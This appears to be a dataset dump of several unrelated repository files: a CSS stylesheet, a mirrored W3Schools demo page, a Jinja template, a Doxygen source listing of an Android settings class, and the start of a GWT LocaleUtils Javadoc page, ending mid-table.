#gkLogo.text .gkLogoSlogan {
display: block;
font-size: 14px;
font-weight: bold;
line-height: 20px;
text-align: center;
}
/* Blocks */
#wrapper {
padding: 100px;
}
/* Other elements */
h1 {
font-size: 260px;
font-weight: 700;
letter-spacing: -8px;
line-height: 1.2;
margin: 0;
}
h2,
h3 {
font-size: 60px;
font-weight: 300;
line-height: 1;
margin: 36px 0 0;
text-transform: uppercase;
}
h3 {
font-size: 20px;
font-weight: 400;
line-height: 1.2;
margin: 18px 0 60px;
}
fieldset {
border: none;
background: #608a69;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
border-radius: 2px;
margin: 0 auto;
overflow: hidden;
padding: 50px 0;
width: 860px;
}
input[type="text"],
input[type="password"],
input[type="url"],
input[type="email"] {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
-ms-box-sizing: border-box;
-o-box-sizing: border-box;
box-sizing: border-box;
border: 1px solid #e5e5e5;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
border-radius: 2px;
font-size: 14px;
font-weight: 300;
color: #848484;
height: 44px;
padding: 0 10px;
}
legend {
color: #333;
font-size: 22px
}
html.-moz-select {
padding: 3px 5px
}
input[type="text"]:focus,
input[type="password"]:focus,
input[type="url"]:focus,
input[type="email"]:focus,
textarea:focus {
background: #fffef4;
}
input[type="submit"],
input[type="button"] {
background: #81ac8b;
border: none;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
border-radius: 2px;
color: #fff!important;
cursor: pointer;
font-size: 14px;
font-weight: 400;
height: 44px;
line-height: 44px;
margin: 0 5px 2px 12px;
padding: 0 15px;
text-align: center;
text-transform: uppercase;
-webkit-transition: all .3s ease-out;
-moz-transition: all .3s ease-out;
-o-transition: all .3s ease-out;
transition: all .3s ease-out
}
input[type="submit"]:hover,
input[type="button"]:hover {
background: #fff;
color: #81ac8b!important;
}
label {
color: #fff;
font-size: 14px;
font-weight: 600;
padding: 0 12px 0 24px;
text-transform: uppercase
}
/* messages */
#system-message {
margin: 0;
}
#system-message dd ul {
list-style: none!important
}
#system-message dd {
-moz-box-sizing: border-box;
-ms-box-sizing: border-box;
-o-box-sizing: border-box;
-webkit-box-sizing: border-box;
background-color: #f8f8f8;
box-sizing: border-box;
color: #333;
font-size: 16px;
font-weight: 600;
min-height: 30px;
padding: 12px 12px 12px 66px;
text-align: center;
}
#system-message dd.error {
background-color: #333;
color: #fff;
}
#system-message dd.notice {
background-color: #FFFEF4;
}
#system-message-container {
margin: 0;
padding: 0;
}
#system-message dd:before {
font-family: FontAwesome;
font-size: 24px;
position: absolute;
top: 5px;
left: 22px;
}
#system-message dd:before {
color: #333;
content: "\f0e6";
}
#system-message dd.notice:before {
color: #333;
content: "\f0eb";
}
#system-message dd.error:before {
color: #fff;
content: "\f057";
}
@media (max-width: 960px) {
#wrapper {
padding: 60px;
}
#gkPage {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
max-width: 100%;
padding: 20px;
}
#wrapper > div,
#wrapper > div + div,
#wrapper > div + div + div {
clear: both;
float: none;
width: 100%;
}
h1 {
font-size: 160px;
letter-spacing: -3px;
margin: -20px 0 10px 0;
text-align: center;
}
h2 {
font-size: 32px;
}
h3 {
font-size: 22px;
}
fieldset {
padding: 20px 0;
width: 280px;
}
fieldset input {
margin-bottom: 10px;
}
fieldset input[type="submit"] {
margin-top: 20px;
}
}
@media (max-width: 600px) {
#wrapper {
padding: 20px;
}
#gkPage {
margin: 12px 0!important;
}
h1 {
font-size: 120px;
letter-spacing: 0;
margin: -20px 0 10px 0;
text-align: center;
}
h2 {
font-size: 26px;
}
h3 {
font-size: 18px;
}
}
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/php/demo_func_string_str_repeat.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/php/demo_func_string_str_repeat.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:36:12 GMT -->
<body>
.............
</body>
<!-- Mirrored from www.w3schools.com/php/demo_func_string_str_repeat.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:36:12 GMT -->
</html> |
mr/resources/templates/ui/job/submit_navigate.html | dsoprea/JobX | {% extends "layouts/base.html" %}
{% block title %}
- Job Submit
{% endblock %}
{% block body %}
Submit navigate!
{% endblock %}
|
html/_general_settings_8java_source.html | Vastlab/Wildlifecam | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.7"/>
<title>WildlifeCapture: src/com/securics/wildlifecapture/GeneralSettings.java Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">WildlifeCapture
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.7 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Packages</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Variables</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li><li class="navelem"><a class="el" href="dir_541eb0a6c58a7690acc5b848a4b1b724.html">com</a></li><li class="navelem"><a class="el" href="dir_09b6bfa87351d8e6ec1ada81677cd2dc.html">securics</a></li><li class="navelem"><a class="el" href="dir_99e5fe23c67375e957acd05c98148ca8.html">wildlifecapture</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">GeneralSettings.java</div> </div>
</div><!--header-->
<div class="contents">
<a href="_general_settings_8java.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno"> 1</span> <span class="keyword">package </span>com.securics.wildlifecapture;</div>
<div class="line"><a name="l00002"></a><span class="lineno"> 2</span> </div>
<div class="line"><a name="l00003"></a><span class="lineno"> 3</span> <span class="keyword">import</span> android.content.Context;</div>
<div class="line"><a name="l00004"></a><span class="lineno"> 4</span> <span class="keyword">import</span> android.preference.PreferenceCategory;</div>
<div class="line"><a name="l00005"></a><span class="lineno"> 5</span> <span class="keyword">import</span> android.util.AttributeSet;</div>
<div class="line"><a name="l00006"></a><span class="lineno"> 6</span> <span class="keyword">import</span> android.util.Log;</div>
<div class="line"><a name="l00007"></a><span class="lineno"> 7</span> <span class="keyword">import</span> android.view.View;</div>
<div class="line"><a name="l00008"></a><span class="lineno"> 8</span> </div>
<div class="line"><a name="l00009"></a><span class="lineno"><a class="line" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html"> 9</a></span> <span class="keyword">public</span> <span class="keyword">class </span><a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html">GeneralSettings</a> <span class="keyword">extends</span> PreferenceCategory {</div>
<div class="line"><a name="l00010"></a><span class="lineno"> 10</span> </div>
<div class="line"><a name="l00011"></a><span class="lineno"> 11</span>  Context context;</div>
<div class="line"><a name="l00012"></a><span class="lineno"> 12</span>  AttributeSet attr;</div>
<div class="line"><a name="l00013"></a><span class="lineno"> 13</span>  String[] params = null;</div>
<div class="line"><a name="l00014"></a><span class="lineno"> 14</span>  <span class="keywordtype">boolean</span> loaded;</div>
<div class="line"><a name="l00015"></a><span class="lineno"> 15</span>  </div>
<div class="line"><a name="l00022"></a><span class="lineno"><a class="line" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a947ed82c58f96a484976d6fb96dd87db"> 22</a></span>  <span class="keyword">public</span> <a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a947ed82c58f96a484976d6fb96dd87db">GeneralSettings</a>(Context context, AttributeSet attrs) {</div>
<div class="line"><a name="l00023"></a><span class="lineno"> 23</span>  super(context, attrs);</div>
<div class="line"><a name="l00024"></a><span class="lineno"> 24</span>  this.context = context;</div>
<div class="line"><a name="l00025"></a><span class="lineno"> 25</span>  this.attr = attrs;</div>
<div class="line"><a name="l00026"></a><span class="lineno"> 26</span> </div>
<div class="line"><a name="l00027"></a><span class="lineno"> 27</span>  <span class="keywordflow">if</span>(this.getTitle().equals(context.getResources().getString(R.string.general_stuff))) {</div>
<div class="line"><a name="l00028"></a><span class="lineno"> 28</span>  params = context.getResources().getStringArray(R.array.General_Squirrel_Params);</div>
<div class="line"><a name="l00029"></a><span class="lineno"> 29</span>  }</div>
<div class="line"><a name="l00030"></a><span class="lineno"> 30</span>  <span class="comment">/*else if(this.getTitle().equals(context.getResources().getString(R.string.general_swindow))) {</span></div>
<div class="line"><a name="l00031"></a><span class="lineno"> 31</span> <span class="comment"> params = context.getResources().getStringArray(R.array.Sliding_Window_Params);</span></div>
<div class="line"><a name="l00032"></a><span class="lineno"> 32</span> <span class="comment"> }*/</span></div>
<div class="line"><a name="l00033"></a><span class="lineno"> 33</span>  <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00034"></a><span class="lineno"> 34</span>  <span class="keywordflow">if</span>(<a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_main_activity.html">MainActivity</a>.<a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_main_activity.html#af683177dcc2165774be47543d1e4bb2c">debugMode</a>) Log.e(<span class="stringliteral">"GeneralSettings"</span>,<span class="stringliteral">"Shouldn't have been here. Params not set"</span>);</div>
<div class="line"><a name="l00035"></a><span class="lineno"> 35</span>  }</div>
<div class="line"><a name="l00036"></a><span class="lineno"> 36</span>  loaded = <span class="keyword">false</span>;</div>
<div class="line"><a name="l00037"></a><span class="lineno"> 37</span> </div>
<div class="line"><a name="l00038"></a><span class="lineno"> 38</span>  }</div>
<div class="line"><a name="l00039"></a><span class="lineno"> 39</span> </div>
<div class="line"><a name="l00043"></a><span class="lineno"> 43</span>  @Override</div>
<div class="line"><a name="l00044"></a><span class="lineno"><a class="line" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a1389858c3248ff869b79e51bbce5d62b"> 44</a></span>  <span class="keyword">protected</span> <span class="keywordtype">void</span> <a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a1389858c3248ff869b79e51bbce5d62b">onBindView</a>(View view) {</div>
<div class="line"><a name="l00045"></a><span class="lineno"> 45</span>  super.onBindView(view);</div>
<div class="line"><a name="l00046"></a><span class="lineno"> 46</span>  <span class="comment">//Log.i("GeneralSettings", "onBind");</span></div>
<div class="line"><a name="l00047"></a><span class="lineno"> 47</span> </div>
<div class="line"><a name="l00048"></a><span class="lineno"> 48</span>  <a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a205e07417005d51159f25e6824e3f2e4">loadParams</a>();</div>
<div class="line"><a name="l00049"></a><span class="lineno"> 49</span>  }</div>
<div class="line"><a name="l00050"></a><span class="lineno"> 50</span> </div>
<div class="line"><a name="l00054"></a><span class="lineno"><a class="line" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a205e07417005d51159f25e6824e3f2e4"> 54</a></span>  <span class="keyword">private</span> <span class="keywordtype">void</span> <a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a205e07417005d51159f25e6824e3f2e4">loadParams</a>() {</div>
<div class="line"><a name="l00055"></a><span class="lineno"> 55</span>  </div>
<div class="line"><a name="l00056"></a><span class="lineno"> 56</span>  <span class="keywordflow">if</span>(loaded) <span class="keywordflow">return</span>;</div>
<div class="line"><a name="l00057"></a><span class="lineno"> 57</span>  loaded = <span class="keyword">true</span>;</div>
<div class="line"><a name="l00058"></a><span class="lineno"> 58</span>  <span class="keywordflow">for</span>(<span class="keywordtype">int</span> i=0; i < params.length; i+=2) {</div>
<div class="line"><a name="l00059"></a><span class="lineno"> 59</span>  String p = params[i];</div>
<div class="line"><a name="l00060"></a><span class="lineno"> 60</span>  <span class="comment">//String d = params[i+1];</span></div>
<div class="line"><a name="l00061"></a><span class="lineno"> 61</span>  <a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference.html">MyNumberPreference</a> mp = <span class="keyword">new</span> <a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference.html">MyNumberPreference</a>(context,attr);</div>
<div class="line"><a name="l00062"></a><span class="lineno"> 62</span>  <span class="keywordflow">if</span>(p.equalsIgnoreCase(<span class="stringliteral">"maxratio"</span>) || p.equalsIgnoreCase(<span class="stringliteral">"scalefactor"</span>) || p.equalsIgnoreCase(<span class="stringliteral">"fudge"</span>) )</div>
<div class="line"><a name="l00063"></a><span class="lineno"> 63</span>  mp.<a class="code" href="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference.html#aafde84d2df6b4b28590b36a5a012db53">setType</a>(<span class="stringliteral">"float"</span>);</div>
<div class="line"><a name="l00064"></a><span class="lineno"> 64</span>  mp.setKey(p);</div>
<div class="line"><a name="l00065"></a><span class="lineno"> 65</span>  mp.setTitle(p);</div>
<div class="line"><a name="l00066"></a><span class="lineno"> 66</span>  <span class="comment">//Log.i("GeneralSettings","Setting Default of: "+d);</span></div>
<div class="line"><a name="l00067"></a><span class="lineno"> 67</span>  mp.defaultValue(params[i+1]);</div>
<div class="line"><a name="l00068"></a><span class="lineno"> 68</span>  this.addItemFromInflater(mp);</div>
<div class="line"><a name="l00069"></a><span class="lineno"> 69</span>  }</div>
<div class="line"><a name="l00070"></a><span class="lineno"> 70</span>  }</div>
<div class="line"><a name="l00071"></a><span class="lineno"> 71</span> </div>
<div class="line"><a name="l00072"></a><span class="lineno"> 72</span> </div>
<div class="line"><a name="l00073"></a><span class="lineno"> 73</span> }</div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_main_activity_html_af683177dcc2165774be47543d1e4bb2c"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_main_activity.html#af683177dcc2165774be47543d1e4bb2c">com.securics.wildlifecapture.MainActivity.debugMode</a></div><div class="ttdeci">static boolean debugMode</div><div class="ttdef"><b>Definition:</b> <a href="_main_activity_8java_source.html#l00074">MainActivity.java:74</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings_html"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html">com.securics.wildlifecapture.GeneralSettings</a></div><div class="ttdef"><b>Definition:</b> <a href="_general_settings_8java_source.html#l00009">GeneralSettings.java:9</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference_html"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference.html">com.securics.wildlifecapture.MyNumberPreference</a></div><div class="ttdef"><b>Definition:</b> <a href="_my_number_preference_8java_source.html#l00014">MyNumberPreference.java:14</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference_html_aafde84d2df6b4b28590b36a5a012db53"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_my_number_preference.html#aafde84d2df6b4b28590b36a5a012db53">com.securics.wildlifecapture.MyNumberPreference.setType</a></div><div class="ttdeci">void setType(String type)</div><div class="ttdef"><b>Definition:</b> <a href="_my_number_preference_8java_source.html#l00037">MyNumberPreference.java:37</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings_html_a1389858c3248ff869b79e51bbce5d62b"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a1389858c3248ff869b79e51bbce5d62b">com.securics.wildlifecapture.GeneralSettings.onBindView</a></div><div class="ttdeci">void onBindView(View view)</div><div class="ttdef"><b>Definition:</b> <a href="_general_settings_8java_source.html#l00044">GeneralSettings.java:44</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_main_activity_html"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_main_activity.html">com.securics.wildlifecapture.MainActivity</a></div><div class="ttdef"><b>Definition:</b> <a href="_main_activity_8java_source.html#l00065">MainActivity.java:65</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings_html_a205e07417005d51159f25e6824e3f2e4"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a205e07417005d51159f25e6824e3f2e4">com.securics.wildlifecapture.GeneralSettings.loadParams</a></div><div class="ttdeci">void loadParams()</div><div class="ttdef"><b>Definition:</b> <a href="_general_settings_8java_source.html#l00054">GeneralSettings.java:54</a></div></div>
<div class="ttc" id="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings_html_a947ed82c58f96a484976d6fb96dd87db"><div class="ttname"><a href="classcom_1_1securics_1_1wildlifecapture_1_1_general_settings.html#a947ed82c58f96a484976d6fb96dd87db">com.securics.wildlifecapture.GeneralSettings.GeneralSettings</a></div><div class="ttdeci">GeneralSettings(Context context, AttributeSet attrs)</div><div class="ttdef"><b>Definition:</b> <a href="_general_settings_8java_source.html#l00022">GeneralSettings.java:22</a></div></div>
</div><!-- fragment --></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Wed Oct 1 2014 11:37:35 for WildlifeCapture by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.7
</small></address>
</body>
</html>
|
web/WEB-INF/classes/gwt-2.6.0/doc/javadoc/com/google/gwt/i18n/rebind/LocaleUtils.html | JakaCikac/dScrum | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<TITLE>
LocaleUtils (Google Web Toolkit Javadoc)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="LocaleUtils (Google Web Toolkit Javadoc)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/LocaleUtils.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
GWT 2.6.0</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV CLASS
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?com/google/gwt/i18n/rebind/LocaleUtils.html" target="_top"><B>FRAMES</B></A>
<A HREF="LocaleUtils.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
com.google.gwt.i18n.rebind</FONT>
<BR>
Class LocaleUtils</H2>
<PRE>
java.lang.Object
<IMG SRC="../../../../../resources/inherit.gif" ALT="extended by "><B>com.google.gwt.i18n.rebind.LocaleUtils</B>
</PRE>
<HR>
<DL>
<DT><PRE>public class <B>LocaleUtils</B><DT>extends java.lang.Object</DL>
</PRE>
<P>
Utility methods for dealing with locales.
<P>
<P>
<HR>
<P>
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Field Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>(package private) static java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#PROP_LOCALE">PROP_LOCALE</A></B></CODE>
<BR>
The token representing the locale property controlling Localization.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>(package private) static java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#PROP_LOCALE_COOKIE">PROP_LOCALE_COOKIE</A></B></CODE>
<BR>
The config property identifying the cookie name to possibly get the value
of the locale property.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>(package private) static java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#PROP_LOCALE_QUERY_PARAM">PROP_LOCALE_QUERY_PARAM</A></B></CODE>
<BR>
The config property identifying the URL query paramter name to possibly get
the value of the locale property.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>(package private) static java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#PROP_RUNTIME_LOCALES">PROP_RUNTIME_LOCALES</A></B></CODE>
<BR>
The token representing the runtime.locales configuration property.</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.util.Set<<A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A>></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getAllCompileLocales()">getAllCompileLocales</A></B>()</CODE>
<BR>
Returns the set of all compile-time locales.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.util.Set<<A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A>></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getAllLocales()">getAllLocales</A></B>()</CODE>
<BR>
Returns the set of all available locales, whether compile-time locales or
runtime locales.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getCompileLocale()">getCompileLocale</A></B>()</CODE>
<BR>
Returns the static compile-time locale for this permutation.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getCookie()">getCookie</A></B>()</CODE>
<BR>
Return the name of the cookie to potentially get the locale value from.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html" title="class in com.google.gwt.i18n.rebind">LocaleUtils</A></CODE></FONT></TD>
